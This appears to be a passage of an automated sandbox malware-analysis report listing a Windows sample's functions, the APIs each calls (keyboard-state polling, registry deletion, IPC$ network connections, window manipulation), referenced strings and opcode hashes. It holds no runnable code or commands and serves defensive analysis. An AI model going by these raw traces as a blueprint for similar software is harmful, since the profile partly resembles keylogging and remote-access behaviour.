                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AB18C31900219DFEF14CF69C9847AE7BF2BF84710F188069EC489F295D770A980EB91
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00F652E6
                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00F65328
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F65339
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00F65345
                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00F6537A
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00F653B2
                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00F653EB
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00F65445
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00F65477
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F654EF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                        • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                        • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                        • Opcode ID: c7dcf7d2f97426d102d8c398e42fc9185b9c682d3c6412076a19316e500a0fd0
                                                                                                                                                                                                                                                                                        • Instruction ID: 4685eb2a9be81f75402dc5df3c0746e0f1c7932d19218917a2907355f20ea3b4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7dcf7d2f97426d102d8c398e42fc9185b9c682d3c6412076a19316e500a0fd0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA914671504B06AFD708CF24CC95BAAB7A9FF00B14F144619FA8AA3181EB31ED45EB81
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F997B6
                                                                                                                                                                                                                                                                                        • GetFocus.USER32 ref: 00F997C6
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00F997D1
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00F99879
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F9992B
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00F99948
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00F99958
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F9998A
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F999CC
                                                                                                                                                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F999FD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(00FD29C0,000000FF,00000000,00000030), ref: 00F6C973
                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(00FD29C0,00000004,00000000,00000030), ref: 00F6C9A8
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00F6C9BA
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00F6CA00
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00F6CA1D
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00F6CA49
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00F6CA90
                                                                                                                                                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F6CAD6
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F6CAEB
                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F6CB0C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F6E4D4
                                                                                                                                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F6E4FA
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6E504
                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00F6E554
                                                                                                                                                                                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F6E570
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                        • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8D6C4
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00F8D6ED
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F8D7A8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00F8D70A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00F8D71D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F8D72F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F8D765
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8D788
                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F8D753
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00F6EFCB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1F215: timeGetTime.WINMM(?,?,00F6EFEB), ref: 00F1F219
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F6EFF8
                                                                                                                                                                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00F6F01C
                                                                                                                                                                                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F6F03E
                                                                                                                                                                                                                                                                                        • SetActiveWindow.USER32 ref: 00F6F05D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F6F06B
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F6F08A
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00F6F095
                                                                                                                                                                                                                                                                                        • IsWindow.USER32 ref: 00F6F0A1
                                                                                                                                                                                                                                                                                        • EndDialog.USER32(00000000), ref: 00F6F0B2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                        • String ID: BUTTON
                                                                                                                                                                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                        • Opcode ID: ecbd4882229ca5f9fb8197db7b4837a5159197039954d9733c07526488f0c82b
                                                                                                                                                                                                                                                                                        • Instruction ID: e4ee5ca63a9137944a0ccf1847bebb3bf0c4e07fd721cb735f253c78167c8fcd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecbd4882229ca5f9fb8197db7b4837a5159197039954d9733c07526488f0c82b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9121F37650920DBFE7102F30FC89F267B6AFB49754B110027F60282272CB368C44BB62
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F6F374
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F6F38A
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6F39B
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F6F3AD
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F6F3BE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                        • Opcode ID: 0ee738b482d05db27e862c152edf4cc2ac20acdd7ba0f47645dbe0d9ae129d12
                                                                                                                                                                                                                                                                                        • Instruction ID: fa2582d97322de4bd12f6f74078b53abb29bf34f145dc6a2514d4e6d82c0e90b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ee738b482d05db27e862c152edf4cc2ac20acdd7ba0f47645dbe0d9ae129d12
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC11A371A5035A79D720B7669C4BFFF7A7CEBD2B50F40042D7801E20D0DAB09908F9A2
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00F6A9D9
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00F6AA44
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00F6AA64
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00F6AA7B
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00F6AAAA
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00F6AABB
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00F6AAE7
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00F6AAF5
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00F6AB1E
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00F6AB2C
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00F6AB55
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00F6AB63
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e617f03ef87a326b2a836337df971db71f193a78866df072d48aee60a77c31e0
                                                                                                                                                                                                                                                                                        • Instruction ID: b9bb123a205dbbcfed511ab9b6f7feaa5be5fab8a50754d06670b01b3270b08a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e617f03ef87a326b2a836337df971db71f193a78866df072d48aee60a77c31e0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B451E860E0478829FB35D7A48950BEABFB59F02350F08459AC5C26B1C2DA549F8CEF63
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00F66649
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F66662
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F666C0
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00F666D0
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F666E2
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F66736
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F66744
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F66756
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F66798
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00F667AB
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F667C1
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F667CE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F01488,?,00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F01865
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00F01521
                                                                                                                                                                                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F015BB
                                                                                                                                                                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00F429B4
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F429E2
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F429F9
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F0145A,00000000), ref: 00F42A15
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F42A27
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F02234: GetWindowLongW.USER32(?,000000EB), ref: 00F02242
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00F02152
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00F50D31,00000001,0000138C,00000001,00000000,00000001,?,00F7EEAE,00FD2430), ref: 00F6A091
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,00F50D31,00000001), ref: 00F6A09A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F50D31,00000001,0000138C,00000001,00000000,00000001,?,00F7EEAE,00FD2430,?), ref: 00F6A0BC
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,00F50D31,00000001), ref: 00F6A0BF
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F6A1E0
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F61093
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F610AF
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F610CB
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F610F5
                                                                                                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00F6111D
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F61128
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F6112D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                        • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F94AD9
                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F94AE0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F94AF3
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F94AFB
                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F94B06
                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00F94B10
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F94B1A
                                                                                                                                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00F94B30
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00F94B3C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F846B9
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F846E7
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F846F1
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8478A
                                                                                                                                                                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00F8480E
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F84932
                                                                                                                                                                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F8496B
                                                                                                                                                                                                                                                                                        • CoGetObject.OLE32(?,00000000,00FA0B64,?), ref: 00F8498A
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F8499D
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F84A21
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F84A35
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F78538
                                                                                                                                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F785D4
                                                                                                                                                                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00F785E8
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00FA0CD4,00000000,00000001,00FC7E8C,?), ref: 00F78634
                                                                                                                                                                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F786B9
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00F78711
                                                                                                                                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00F7879C
                                                                                                                                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F787BF
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00F787C6
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00F7881B
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F78821
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
